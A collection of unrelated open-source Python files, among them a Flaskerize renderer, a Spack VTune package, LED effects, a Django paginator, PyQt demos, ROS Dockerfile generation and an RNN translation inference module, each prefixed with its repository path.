outpath = self._generate_outfile(filename, self.src_path, context=context)
outdir, outfile = os.path.split(outpath)
rendered_outpath = os.path.join(self.src_path, outpath)
rendered_outdir = os.path.join(rendered_outpath, outdir)
if self.sch_fs.isfile(filename):
self.copy_from_sch(filename, outpath)
def print_summary(self):
"""Print summary of operations performed"""
print(
f"""
Flaskerize job summary:
{colored("Schematic generation successful!", "green")}
Full schematic path: {colored(self.schematic_path, "yellow")}
"""
)
self.fs.print_fs_diff()
def _load_run_function(self, path: str) -> Callable:
from importlib.util import spec_from_file_location, module_from_spec
spec = spec_from_file_location("run", path)
module = module_from_spec(spec)
spec.loader.exec_module(module)
if not hasattr(module, "run"):
raise ValueError(f"No method 'run' function found in {path}")
return getattr(module, "run")
def _load_custom_functions(self, path: str) -> None:
import os
from flaskerize import registered_funcs
from importlib.util import spec_from_file_location, module_from_spec
if not os.path.exists(path):
return
spec = spec_from_file_location("custom_functions", path)
module = module_from_spec(spec)
spec.loader.exec_module(module)
for f in registered_funcs:
self.env.globals[f.__name__] = f
def render(self, name: str, args: List[Any]) -> None:
"""Renders the schematic"""
context = vars(self.arg_parser.parse_args(args))
if "name" in context:
raise ValueError(
"Collision between Flaskerize-reserved parameter "
"'name' and parameter found in schema.json corresponding "
f"to {self.schematic_path}"
)
context = {**context, "name": name}
self._load_custom_functions(
path=os.path.join(self.schematic_path, "custom_functions.py")
)
try:
run = self._load_run_function(
path=os.path.join(self.schematic_path, "run.py")
)
except (ImportError, ValueError, FileNotFoundError) as e:
run = default_run
run(renderer=self, context=context)
self.fs.commit()
def default_run(renderer: SchematicRenderer, context: Dict[str, Any]) -> None:
"""Default run method"""
template_files = renderer.get_template_files()
static_files = renderer.get_static_files()
# TODO: add test that static files are correctly removed from template_files, etc
for filename in template_files:
renderer.render_from_file(filename, context=context)
for filename in static_files:
renderer.copy_static_file(filename, context=context)
renderer.print_summary()
|
var/spack/repos/builtin/packages/intel-oneapi-vtune/package.py | BenWibking/spack | 2,360 | 11097046 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import platform
from spack import *
class IntelOneapiVtune(IntelOneApiPackage):
"""Intel oneAPI VTune Profiler.
Installed in Perf driverless mode, detailed here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-cookbook/top/configuration-recipes/profiling-hardware-without-sampling-drivers.html
Users can manually install drivers, please read the instructions here: https://software.intel.com/content/www/us/en/develop/documentation/vtune-help/top/set-up-analysis-target/linux-targets/building-and-installing-the-sampling-drivers-for-linux-targets.html
"""
maintainers = ['rscohn2']
homepage = 'https://software.intel.com/content/www/us/en/develop/tools/oneapi/components/vtune-profiler.html'
if platform.system() == 'Linux':
version('2022.0.0',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18406/l_oneapi_vtune_p_2022.0.0.94_offline.sh',
sha256='aa4d575c22e7be0c950b87d67d9e371f470f682906864c4f9b68e530ecd22bd7',
expand=False)
version('2021.7.1',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18086/l_oneapi_vtune_p_2021.7.1.492_offline.sh',
sha256='4cf17078ae6e09f26f70bd9d0b726af234cc30c342ae4a8fda69941b40139b26',
expand=False)
version('2021.6.0',
url='https://registrationcenter-download.intel.com/akdlm/irc_nas/18012/l_oneapi_vtune_p_2021.6.0.411_offline.sh',
sha256='6b1df7da713337aa665bcc6ff23e4a006695b5bfaf71dffd305cbadca2e5560c',
expand=False)
@property
def component_dir(self):
return 'vtune'
|
examples/python-base64.py | alexmv/go-camo | 161 | 11097063 | # Copyright (c) 2012-2019 <NAME>
# Use of this source code is governed by an MIT-style
# license that can be found in the LICENSE file.
import hashlib
import hmac
import base64
CAMO_HOST = 'https://img.example.com'
def camo_url(hmac_key, image_url):
if image_url.startswith("https:"):
return image_url
b64digest = base64.urlsafe_b64encode(
hmac.new(hmac_key, image_url, hashlib.sha1).digest()).strip('=')
b64url = base64.urlsafe_b64encode(image_url).strip('=')
requrl = '%s/%s/%s' % (CAMO_HOST, b64digest, b64url)
return requrl
print camo_url("test", "http://golang.org/doc/gopher/frontpage.png")
# 'https://img.example.org/D23vHLFHsOhPOcvdxeoQyAJTpvM/aHR0cDovL2dvbGFuZy5vcmcvZG9jL2dvcGhlci9mcm9udHBhZ2UucG5n'
|
effects/pacman.py | Bosken85/hyperion.ng | 1,808 | 11097070 | import hyperion, time
from random import randint
#get args
rotationTime = float(hyperion.args.get('rotationTime', 4))
marginPos = float(hyperion.args.get('margin-pos', 2))
# define pacman
pacman = bytearray((255, 255, 0))
# define ghosts
redGuy = bytearray((255, 0, 0))
pinkGuy = bytearray((255, 184, 255))
blueGuy = bytearray((0, 255, 255))
slowGuy = bytearray((255, 184, 81))
light = bytearray((255, 184, 174))
background = bytearray((0, 0, 0))
#helper
posPac = 1
diffPac = 6*marginPos
diffGuys = 3*marginPos
sleepTime = max(0.02,rotationTime/hyperion.ledCount)
posPinkGuy = posPac + diffPac
posBlueGuy = posPinkGuy + diffGuys
posSlowGuy = posBlueGuy + diffGuys
posRedGuy = posSlowGuy + diffGuys
# initialize the led data
ledDataEscape = bytearray()
for i in range(hyperion.ledCount):
if i == 1:
ledDataEscape += pacman
elif i == posPinkGuy:
ledDataEscape += pinkGuy
elif i == posBlueGuy:
ledDataEscape += blueGuy
elif i == posSlowGuy:
ledDataEscape += slowGuy
elif i == posRedGuy:
ledDataEscape += redGuy
else:
ledDataEscape += background
ledDataChase = bytearray()
for i in range(hyperion.ledCount):
if i == 1:
ledDataChase += pacman
elif i in [posPinkGuy, posBlueGuy, posSlowGuy, posRedGuy]:
ledDataChase += bytearray((33, 33, 255))
else:
ledDataChase += background
# increment = 3, because LED-Color is defined by 3 Bytes
increment = 3
def shiftLED(ledData, increment, limit, lightPos=None):
state = 0
while state < limit and not hyperion.abort():
ledData = ledData[increment:] + ledData[:increment]
if (lightPos):
tmp = ledData[lightPos]
ledData[lightPos] = light
hyperion.setColor(ledData)
if (lightPos):
ledData[lightPos] = tmp
time.sleep(sleepTime)
state += 1
# start the write data loop
while not hyperion.abort():
# escape mode
ledData = ledDataEscape
shiftLED(ledData, increment, hyperion.ledCount)
random = randint(10,hyperion.ledCount)
# escape mode + power pellet
s = slice(3*random, 3*random+3)
shiftLED(ledData, increment, hyperion.ledCount - random, s)
# chase mode
shift = 3*(hyperion.ledCount - random)
ledData = ledDataChase[shift:]+ledDataChase[:shift]
shiftLED(ledData, -increment, 2*hyperion.ledCount-random)
time.sleep(sleepTime)
|
app/jwt_utils.py | ristekoss/susunjadwal-backend | 155 | 11097103 | <filename>app/jwt_utils.py
import jwt
from flask import current_app as app
def encode_token(data):
return jwt.encode(data, app.config["SECRET_KEY"], algorithm='HS256').decode()
def decode_token(token):
try:
data = jwt.decode(token, app.config["SECRET_KEY"], algorithm='HS256')
except:
return None
return data
|
examples/python/main.py | timfjord/sublime_debugger | 225 | 11097104 |
import time
from threading import Thread
import sys
import os
print(sys.version)
# print(os.environ)
def some_random_variables():
string = "abc"
integer = 1
floating = 2.345
array = [string, integer, floating]
table = {
'string': string,
'intger': integer,
'float': floating,
'array': array,
}
print(string)
print(integer)
print(floating)
print(array)
print(table)
def test():
some_random_variables()
def sleep(duration):
print("Sleeping thread for {}".format(duration))
time.sleep(duration)
threads = []
for i in range(1, 5):
thread = Thread(name='Thread #{}'.format(i), target=sleep, args=(i/2.0,))
thread.start()
threads.append(thread)
some_lambda = lambda: test()
some_lambda()
for thread in threads:
thread.join()
print('Done')
|
api/integrations/slack/permissions.py | mevinbabuc/flagsmith | 1,259 | 11097112 | <filename>api/integrations/slack/permissions.py
from rest_framework.permissions import BasePermission
from environments.models import Environment
class OauthInitPermission(BasePermission):
def has_permission(self, request, view):
environment = Environment.objects.get(
api_key=view.kwargs.get("environment_api_key")
)
return request.user.is_environment_admin(environment)
|
scvi/_utils.py | njbernstein/scvi-tools | 398 | 11097130 | from textwrap import dedent
def _doc_params(**kwds):
"""\
Docstrings should start with "\" in the first line for proper formatting.
"""
def dec(obj):
obj.__orig_doc__ = obj.__doc__
obj.__doc__ = dedent(obj.__doc__).format_map(kwds)
return obj
return dec
|
tests/utils/test_dbus.py | pnjongang/supervisor | 597 | 11097142 | """Check dbus-next implementation."""
from dbus_next.signature import Variant
from supervisor.coresys import CoreSys
from supervisor.utils.dbus import DBus, _remove_dbus_signature
def test_remove_dbus_signature():
"""Check D-Bus signature clean-up."""
test = _remove_dbus_signature(Variant("s", "Value"))
assert isinstance(test, str)
assert test == "Value"
test_dict = _remove_dbus_signature({"Key": Variant("s", "Value")})
assert isinstance(test_dict["Key"], str)
assert test_dict["Key"] == "Value"
test_dict = _remove_dbus_signature([Variant("s", "Value")])
assert isinstance(test_dict[0], str)
assert test_dict[0] == "Value"
async def test_dbus_prepare_args(coresys: CoreSys):
"""Check D-Bus dynamic argument builder."""
dbus = DBus("org.freedesktop.systemd1", "/org/freedesktop/systemd1")
signature, args = dbus._prepare_args(
True, 1, 1.0, "Value", ("a{sv}", {"Key": "Value"})
)
assert signature == "bidsa{sv}"
|
python_modules/dagster-graphql/dagster_graphql/schema/pipelines/pipeline_run_stats.py | dbatten5/dagster | 4,606 | 11097149 | import graphene
from dagster import check
from dagster.core.storage.pipeline_run import PipelineRunStatsSnapshot
from ..errors import GraphenePythonError
class GraphenePipelineRunStatsSnapshot(graphene.ObjectType):
id = graphene.NonNull(graphene.String)
runId = graphene.NonNull(graphene.String)
stepsSucceeded = graphene.NonNull(graphene.Int)
stepsFailed = graphene.NonNull(graphene.Int)
materializations = graphene.NonNull(graphene.Int)
expectations = graphene.NonNull(graphene.Int)
enqueuedTime = graphene.Field(graphene.Float)
launchTime = graphene.Field(graphene.Float)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
class Meta:
name = "PipelineRunStatsSnapshot"
def __init__(self, stats):
self._stats = check.inst_param(stats, "stats", PipelineRunStatsSnapshot)
super().__init__(
id="stats-" + self._stats.run_id,
runId=self._stats.run_id,
stepsSucceeded=self._stats.steps_succeeded,
stepsFailed=self._stats.steps_failed,
materializations=self._stats.materializations,
expectations=self._stats.expectations,
enqueuedTime=stats.enqueued_time,
launchTime=stats.launch_time,
startTime=self._stats.start_time,
endTime=self._stats.end_time,
)
class GraphenePipelineRunStatsOrError(graphene.Union):
class Meta:
types = (GraphenePipelineRunStatsSnapshot, GraphenePythonError)
name = "PipelineRunStatsOrError"
|
tomviz/python/ReinterpretSignedToUnsigned.py | sankhesh/tomviz | 284 | 11097168 | <reponame>sankhesh/tomviz
def transform(dataset):
"""Reinterpret a signed integral array type as its unsigned counterpart.
This can be used when the bytes of a data array have been interpreted as a
signed array when it should have been interpreted as an unsigned array."""
import numpy as np
scalars = dataset.active_scalars
if scalars is None:
raise RuntimeError("No scalars found!")
dtype = scalars.dtype
dtype = dtype.type
typeMap = {
np.int8: np.uint8,
np.int16: np.uint16,
np.int32: np.uint32
}
typeAddend = {
np.int8: 128,
np.int16: 32768,
np.int32: 2147483648
}
if dtype not in typeMap:
raise RuntimeError("Scalars are not int8, int16, or int32")
newType = typeMap[dtype]
addend = typeAddend[dtype]
newScalars = scalars.astype(dtype=newType) + addend
dataset.active_scalars = newScalars
|
tg/models.py | horacexd/clist | 166 | 11097172 | <reponame>horacexd/clist
from django.db import models
from pyclist.models import BaseModel
from true_coders.models import Coder
class Chat(BaseModel):
chat_id = models.CharField(max_length=100, blank=True, null=True, unique=True)
coder = models.ForeignKey(Coder, on_delete=models.CASCADE)
title = models.CharField(max_length=100, blank=True, null=True)
name = models.TextField(blank=True, null=True)
secret_key = models.CharField(max_length=20, blank=True, null=True)
last_command = models.JSONField(default=dict, blank=True)
is_group = models.BooleanField(default=False)
coders = models.ManyToManyField(Coder, blank=True, related_name='chats')
settings = models.JSONField(default=dict, blank=True)
def __str__(self):
return "%s#%s" % (self.coder_id, self.chat_id)
def get_group_name(self):
return "%s@%s" % (self.chat_id, self.title)
class History(BaseModel):
LIMIT_BY_CHAT = 7
chat = models.ForeignKey(Chat, on_delete=models.CASCADE)
message = models.JSONField()
def __str__(self):
return "Histroy %s" % (self.chat)
def save(self, *args, **kwargs):
q = History.objects.filter(chat=self.chat).order_by('created')
count = q.count()
if count > self.LIMIT_BY_CHAT:
for o in q[0:count - self.LIMIT_BY_CHAT]:
o.delete()
super(History, self).save(*args, **kwargs)
class Meta:
verbose_name_plural = 'History'
ordering = ['-created']
|
Silver_Badges/Ayuba_hub_silver_badge/form.py | adeagaoluwaseun/Voting | 764 | 11097177 | from flask_wtf import FlaskForm
from wtforms.validators import DataRequired,Length
class VoterForm(FlaskForm):
username = StringField('Username',validators=[DataRequired(),Length(min=2,max=20)])
nin = IntegerField('Country Code', [validators.required()])
submit = SubmitField('Add Voter') |
desktop/core/src/desktop/lib/paginator.py | kokosing/hue | 5,079 | 11097179 | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Very similar to the Django Paginator class, but easier to work with
when you don't have the full object list.
"""
from django.db.models import query
import django.core.paginator
class Paginator(django.core.paginator.Paginator):
"""
Override certain methods of the Django Paginator to allow a partial object list.
Does not support orphans.
"""
def __init__(self, object_list, per_page, total=None, allow_empty_first_page=True):
"""
Accepts a partial ``object_list``, for the purpose of offset and count calculation.
The ``object_list`` is partial if and only if ``total`` is given. In that case,
the list is the data for the *next* call to ``page()``.
If the ``object_list`` is the full list, ``total`` must be None.
"""
super(Paginator, self).__init__(object_list, per_page, 0, allow_empty_first_page)
if total is None:
self.object_list = object_list
else:
self.object_list = None
self._partial_list = object_list
# We compute the list length again because it could have changed,
# which is solved by evaluating the QuerySet with len().
if isinstance(object_list, query.QuerySet):
total = max(total, len(object_list))
# Override parent's private member _count
self._count = total
def validate_number(self, number):
if self.object_list is None:
return number
return super(Paginator, self).validate_number(number)
def page(self, number):
if self.object_list is None:
# Use a partial list if there is one.
# Make sure the length of the list agrees with the Page range.
if self._partial_list is not None:
res = Page(None, number, self) # Set the object_list later; None for now
n_objs = res.end_index() - res.start_index() + 1
res.object_list = self._partial_list[:n_objs]
self._partial_list = None # The _partial_list is single-use
return res
# No data. Just a list of None's
return Page((None,) * self.per_page, number, self)
# Wrap that parent page in our Page class
pg = super(Paginator, self).page(number) # This is a Django Page
return Page(pg.object_list, pg.number, pg.paginator)
class Page(django.core.paginator.Page):
"""
Similar to the Django Page, with extra convenient methods.
"""
def __init__(self, object_list, number, paginator):
super(Page, self).__init__(object_list, number, paginator)
def num_pages(self):
return self.paginator.num_pages
def total_count(self):
return self.paginator.count
def next_page_number(self):
if self.has_next():
return self.number + 1
return self.number
def previous_page_number(self):
if self.has_previous():
return self.number - 1
return self.number
|
qt__pyqt__pyside__pyqode/pyqt5__QTreeView_QFileSystemModel.py | DazEB2/SimplePyScripts | 117 | 11097205 | <reponame>DazEB2/SimplePyScripts<gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.QtWidgets import QTreeView, QFileSystemModel, QApplication
from PyQt5.QtCore import QDir
if __name__ == '__main__':
app = QApplication([])
model = QFileSystemModel()
model.setRootPath(QDir.currentPath())
model.setReadOnly(False)
mw = QTreeView()
mw.setModel(model)
mw.setRootIndex(model.index(QDir.currentPath()))
mw.show()
app.exec()
|
augly/video/augmenters/ffmpeg/overlay.py | iAdityaEmpire/AugLy | 4,610 | 11097229 | <reponame>iAdityaEmpire/AugLy
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
from typing import List
from augly.utils import is_image_file, is_video_file, pathmgr
from augly.video.augmenters.ffmpeg.base_augmenter import BaseVidgearFFMPEGAugmenter
from augly.video.helpers import get_video_info
class VideoAugmenterByOverlay(BaseVidgearFFMPEGAugmenter):
def __init__(
self,
overlay_path: str,
x_factor: float,
y_factor: float,
use_overlay_audio: bool,
):
assert is_image_file(overlay_path) or is_video_file(
overlay_path
), "Overlaid media type not supported: please overlay either an image or video"
assert 0 <= x_factor <= 1, "x_factor must be a value in the range [0, 1]"
assert 0 <= y_factor <= 1, "y_factor must be a value in the range [0, 1]"
assert (
type(use_overlay_audio) == bool
), "Expected a boolean value for use_overlay_audio"
self.overlay_path = pathmgr.get_local_path(overlay_path)
self.x_factor = x_factor
self.y_factor = y_factor
self.use_overlay_audio = use_overlay_audio and is_video_file(overlay_path)
def get_command(self, video_path: str, output_path: str) -> List[str]:
"""
Overlays media onto the video
@param video_path: the path to the video to be augmented
@param output_path: the path in which the resulting video will be stored.
@returns: a list of strings containing the CLI FFMPEG command for
the augmentation
"""
video_info = get_video_info(video_path)
new_width = video_info["width"] * self.x_factor
new_height = video_info["height"] * self.y_factor
return [
*self.input_fmt(video_path),
"-i",
self.overlay_path,
"-filter_complex",
f"[0:v][1:v] overlay={new_width}:{new_height}",
"-map",
f"{int(self.use_overlay_audio)}:a:0",
*self.output_fmt(output_path),
]
|
ros/create_dockerfiles.py | christophebedard/docker_images-1 | 328 | 11097232 | <filename>ros/create_dockerfiles.py<gh_stars>100-1000
#!/usr/bin/env python3
import os
import sys
import yaml
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from em import Interpreter
from docker_templates.argparse import DockerfileArgParser
from docker_templates.create import create_files
from docker_templates.collections import OrderedLoad
from docker_templates.packages import expandPackages
def main(argv=sys.argv[1:]):
"""Create Dockerfiles for images from platform and image yaml data"""
# Create the top-level parser
parser = DockerfileArgParser(
description="Generate the 'Dockerfile's for the base docker images")
parser.set()
args = parser.parse(argv)
# Read platform params
with open(args.platform, 'r') as f:
# use safe_load instead load
platform = yaml.safe_load(f)['platform']
# Read image params using platform params
images_yaml = StringIO()
try:
interpreter = Interpreter(output=images_yaml)
interpreter.file(open(args.images, 'r'), locals=platform)
images_yaml = images_yaml.getvalue()
except Exception as e:
print("Error processing %s" % args.images)
raise
finally:
interpreter.shutdown()
interpreter = None
# Use ordered dict
images = OrderedLoad(images_yaml, yaml.SafeLoader)['images']
# For each image tag
for image in images:
# Get data for image
data = dict(images[image])
data['tag_name'] = image
# Add platform params
data.update(platform)
# Apply package distro/version formatting
expandPackages(data)
# Get path to save Docker file
dockerfile_dir = os.path.join(args.output, image)
if not os.path.exists(dockerfile_dir):
os.makedirs(dockerfile_dir)
data['dockerfile_dir'] = dockerfile_dir
# generate Dockerfile
create_files(data)
if __name__ == '__main__':
main()
|
build/android/gyp/proguard.py | zipated/src | 2,151 | 11097266 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import sys
from util import build_utils
from util import proguard_util
_DANGEROUS_OPTIMIZATIONS = [
# See crbug.com/825995 (can cause VerifyErrors)
"class/merging/vertical",
"class/unboxing/enum",
# See crbug.com/625992
"code/allocation/variable",
# See crbug.com/625994
"field/propagation/value",
"method/propagation/parameter",
"method/propagation/returnvalue",
]
def _ParseOptions(args):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--proguard-path',
help='Path to the proguard executable.')
parser.add_option('--input-paths',
help='Paths to the .jar files proguard should run on.')
parser.add_option('--output-path', help='Path to the generated .jar file.')
parser.add_option('--proguard-configs', action='append',
help='Paths to proguard configuration files.')
parser.add_option('--proguard-config-exclusions',
default='',
help='GN list of paths to proguard configuration files '
'included by --proguard-configs, but that should '
'not actually be included.')
parser.add_option('--mapping', help='Path to proguard mapping to apply.')
parser.add_option('--is-test', action='store_true',
help='If true, extra proguard options for instrumentation tests will be '
'added.')
parser.add_option('--classpath', action='append',
help='Classpath for proguard.')
parser.add_option('--stamp', help='Path to touch on success.')
parser.add_option('--enable-dangerous-optimizations', action='store_true',
help='Enable optimizations which are known to have issues.')
parser.add_option('--verbose', '-v', action='store_true',
help='Print all proguard output')
options, _ = parser.parse_args(args)
classpath = []
for arg in options.classpath:
classpath += build_utils.ParseGnList(arg)
options.classpath = classpath
configs = []
for arg in options.proguard_configs:
configs += build_utils.ParseGnList(arg)
options.proguard_configs = configs
options.proguard_config_exclusions = (
build_utils.ParseGnList(options.proguard_config_exclusions))
options.input_paths = build_utils.ParseGnList(options.input_paths)
return options
def main(args):
args = build_utils.ExpandFileArgs(args)
options = _ParseOptions(args)
proguard = proguard_util.ProguardCmdBuilder(options.proguard_path)
proguard.injars(options.input_paths)
proguard.configs(options.proguard_configs)
proguard.config_exclusions(options.proguard_config_exclusions)
proguard.outjar(options.output_path)
if options.mapping:
proguard.mapping(options.mapping)
classpath = list(set(options.classpath))
proguard.libraryjars(classpath)
proguard.verbose(options.verbose)
if not options.enable_dangerous_optimizations:
proguard.disable_optimizations(_DANGEROUS_OPTIMIZATIONS)
build_utils.CallAndWriteDepfileIfStale(
proguard.CheckOutput,
options,
input_paths=proguard.GetInputs(),
input_strings=proguard.build(),
output_paths=proguard.GetOutputs(),
depfile_deps=proguard.GetDepfileDeps())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
rnn_translator/pytorch/seq2seq/inference/inference.py | omshri22121999/training | 567 | 11097270 | import contextlib
import logging
import os
import subprocess
import time
import torch
import torch.distributed as dist
import seq2seq.data.config as config
from seq2seq.inference.beam_search import SequenceGenerator
from seq2seq.utils import AverageMeter
from seq2seq.utils import barrier
from seq2seq.utils import get_rank
from seq2seq.utils import get_world_size
def gather_predictions(preds):
world_size = get_world_size()
if world_size > 1:
all_preds = [preds.new(preds.size(0), preds.size(1)) for i in range(world_size)]
dist.all_gather(all_preds, preds)
preds = torch.cat(all_preds)
return preds
class Translator:
"""
Translator runs validation on test dataset, executes inference, optionally
computes BLEU score using sacrebleu.
"""
def __init__(self,
model,
tokenizer,
loader,
beam_size=5,
len_norm_factor=0.6,
len_norm_const=5.0,
cov_penalty_factor=0.1,
max_seq_len=50,
cuda=False,
print_freq=1,
dataset_dir=None,
save_path=None,
target_bleu=None):
self.model = model
self.tokenizer = tokenizer
self.loader = loader
self.insert_target_start = [config.BOS]
self.insert_src_start = [config.BOS]
self.insert_src_end = [config.EOS]
self.batch_first = model.batch_first
self.cuda = cuda
self.beam_size = beam_size
self.print_freq = print_freq
self.dataset_dir = dataset_dir
self.target_bleu = target_bleu
self.save_path = save_path
self.distributed = (get_world_size() > 1)
self.generator = SequenceGenerator(
model=self.model,
beam_size=beam_size,
max_seq_len=max_seq_len,
cuda=cuda,
len_norm_factor=len_norm_factor,
len_norm_const=len_norm_const,
cov_penalty_factor=cov_penalty_factor)
def build_eval_path(self, epoch, iteration):
"""
Appends index of the current epoch and index of the current iteration
to the name of the file with results.
:param epoch: index of the current epoch
:param iteration: index of the current iteration
"""
if iteration is not None:
eval_fname = f'eval_epoch_{epoch}_iter_{iteration}'
else:
eval_fname = f'eval_epoch_{epoch}'
eval_path = os.path.join(self.save_path, eval_fname)
return eval_path
def run(self, calc_bleu=True, epoch=None, iteration=None, eval_path=None,
summary=False, reference_path=None):
"""
Runs translation on test dataset.
:param calc_bleu: if True compares results with reference and computes
BLEU score
:param epoch: index of the current epoch
:param iteration: index of the current iteration
:param eval_path: path to the file for saving results
:param summary: if True prints summary
:param reference_path: path to the file with reference translation
"""
if self.cuda:
test_bleu = torch.cuda.FloatTensor([0])
break_training = torch.cuda.LongTensor([0])
else:
test_bleu = torch.FloatTensor([0])
break_training = torch.LongTensor([0])
if eval_path is None:
eval_path = self.build_eval_path(epoch, iteration)
detok_eval_path = eval_path + '.detok'
with contextlib.suppress(FileNotFoundError):
os.remove(eval_path)
os.remove(detok_eval_path)
rank = get_rank()
logging.info(f'Running evaluation on test set')
self.model.eval()
torch.cuda.empty_cache()
output = self.evaluate(epoch, iteration, summary)
output = output[:len(self.loader.dataset)]
output = self.loader.dataset.unsort(output)
if rank == 0:
with open(eval_path, 'a') as eval_file:
eval_file.writelines(output)
if calc_bleu:
self.run_detokenizer(eval_path)
test_bleu[0] = self.run_sacrebleu(detok_eval_path, reference_path)
if summary:
logging.info(f'BLEU on test dataset: {test_bleu[0]:.2f}')
if self.target_bleu and test_bleu[0] >= self.target_bleu:
logging.info(f'Target accuracy reached')
break_training[0] = 1
barrier()
torch.cuda.empty_cache()
logging.info(f'Finished evaluation on test set')
if self.distributed:
dist.broadcast(break_training, 0)
dist.broadcast(test_bleu, 0)
return test_bleu[0].item(), break_training[0].item()
def evaluate(self, epoch, iteration, summary):
"""
Runs evaluation on test dataset.
:param epoch: index of the current epoch
:param iteration: index of the current iteration
:param summary: if True prints summary
"""
batch_time = AverageMeter(False)
tot_tok_per_sec = AverageMeter(False)
iterations = AverageMeter(False)
enc_seq_len = AverageMeter(False)
dec_seq_len = AverageMeter(False)
stats = {}
output = []
for i, (src, indices) in enumerate(self.loader):
translate_timer = time.time()
src, src_length = src
batch_size = self.loader.batch_size
global_batch_size = batch_size * get_world_size()
beam_size = self.beam_size
bos = [self.insert_target_start] * (batch_size * beam_size)
bos = torch.LongTensor(bos)
if self.batch_first:
bos = bos.view(-1, 1)
else:
bos = bos.view(1, -1)
src_length = torch.LongTensor(src_length)
stats['total_enc_len'] = int(src_length.sum())
if self.cuda:
src = src.cuda()
src_length = src_length.cuda()
bos = bos.cuda()
with torch.no_grad():
context = self.model.encode(src, src_length)
context = [context, src_length, None]
if beam_size == 1:
generator = self.generator.greedy_search
else:
generator = self.generator.beam_search
preds, lengths, counter = generator(batch_size, bos, context)
stats['total_dec_len'] = lengths.sum().item()
stats['iters'] = counter
indices = torch.tensor(indices).to(preds)
preds = preds.scatter(0, indices.unsqueeze(1).expand_as(preds), preds)
preds = gather_predictions(preds).cpu()
for pred in preds:
pred = pred.tolist()
detok = self.tokenizer.detokenize(pred)
output.append(detok + '\n')
elapsed = time.time() - translate_timer
batch_time.update(elapsed, batch_size)
total_tokens = stats['total_dec_len'] + stats['total_enc_len']
ttps = total_tokens / elapsed
tot_tok_per_sec.update(ttps, batch_size)
iterations.update(stats['iters'])
enc_seq_len.update(stats['total_enc_len'] / batch_size, batch_size)
dec_seq_len.update(stats['total_dec_len'] / batch_size, batch_size)
if i % self.print_freq == 0:
log = []
log += f'TEST '
if epoch is not None:
log += f'[{epoch}]'
if iteration is not None:
log += f'[{iteration}]'
log += f'[{i}/{len(self.loader)}]\t'
log += f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
log += f'Decoder iters {iterations.val:.1f} ({iterations.avg:.1f})\t'
log += f'Tok/s {tot_tok_per_sec.val:.0f} ({tot_tok_per_sec.avg:.0f})'
log = ''.join(log)
logging.info(log)
tot_tok_per_sec.reduce('sum')
enc_seq_len.reduce('mean')
dec_seq_len.reduce('mean')
batch_time.reduce('mean')
iterations.reduce('sum')
if summary and get_rank() == 0:
time_per_sentence = (batch_time.avg / global_batch_size)
log = []
log += f'TEST SUMMARY:\n'
log += f'Lines translated: {len(self.loader.dataset)}\t'
log += f'Avg total tokens/s: {tot_tok_per_sec.avg:.0f}\n'
log += f'Avg time per batch: {batch_time.avg:.3f} s\t'
log += f'Avg time per sentence: {1000*time_per_sentence:.3f} ms\n'
log += f'Avg encoder seq len: {enc_seq_len.avg:.2f}\t'
log += f'Avg decoder seq len: {dec_seq_len.avg:.2f}\t'
log += f'Total decoder iterations: {int(iterations.sum)}'
log = ''.join(log)
logging.info(log)
return output
def run_detokenizer(self, eval_path):
"""
Executes moses detokenizer on eval_path file and saves result to
eval_path + ".detok" file.
:param eval_path: path to the tokenized input
"""
logging.info('Running detokenizer')
detok_path = os.path.join(self.dataset_dir, config.DETOKENIZER)
detok_eval_path = eval_path + '.detok'
with open(detok_eval_path, 'w') as detok_eval_file, \
open(eval_path, 'r') as eval_file:
subprocess.run(['perl', f'{detok_path}'], stdin=eval_file,
stdout=detok_eval_file, stderr=subprocess.DEVNULL)
def run_sacrebleu(self, detok_eval_path, reference_path):
"""
Executes sacrebleu and returns BLEU score.
:param detok_eval_path: path to the test file
:param reference_path: path to the reference file
"""
if reference_path is None:
reference_path = os.path.join(self.dataset_dir,
config.TGT_TEST_TARGET_FNAME)
sacrebleu_params = '--score-only -lc --tokenize intl'
logging.info(f'Running sacrebleu (parameters: {sacrebleu_params})')
sacrebleu = subprocess.run([f'sacrebleu --input {detok_eval_path} \
{reference_path} {sacrebleu_params}'],
stdout=subprocess.PIPE, shell=True)
test_bleu = float(sacrebleu.stdout.strip())
return test_bleu
|
servers/docker-python/nohandler/server_app.py | veaba/ncov | 288 | 11097276 | import json
import socketio
from aiohttp import web
# from socket_app import socket_app
from mongo import update_news, query_list
sio = socketio.AsyncServer(cors_allowed_origins='*')
app = web.Application()
sio.attach(app)
async def index(request):
return web.Response(text="Hello Python socket.io", content_type="text/html")
# 连接消息
@sio.event
def connect(sid, environ):
pass
# print('connect_sid', sid)
# print('connect_environ', environ)
# 全局性
# @sio.on('message')
# async def print_message(sid, message):
# # When we receive a new event of type
# # 'message' through a socket.io connection
# # we print the socket ID and the message
# print("Socket ID: ", sid)
# print(111, message)
@sio.on('hello')
async def print_hello(sid, message):
print(222, message)
# time.sleep(2)
# await sio.emit('my_message', {'response': '哈哈收到了'}) # 这样可以,怎么可以主动发送呢
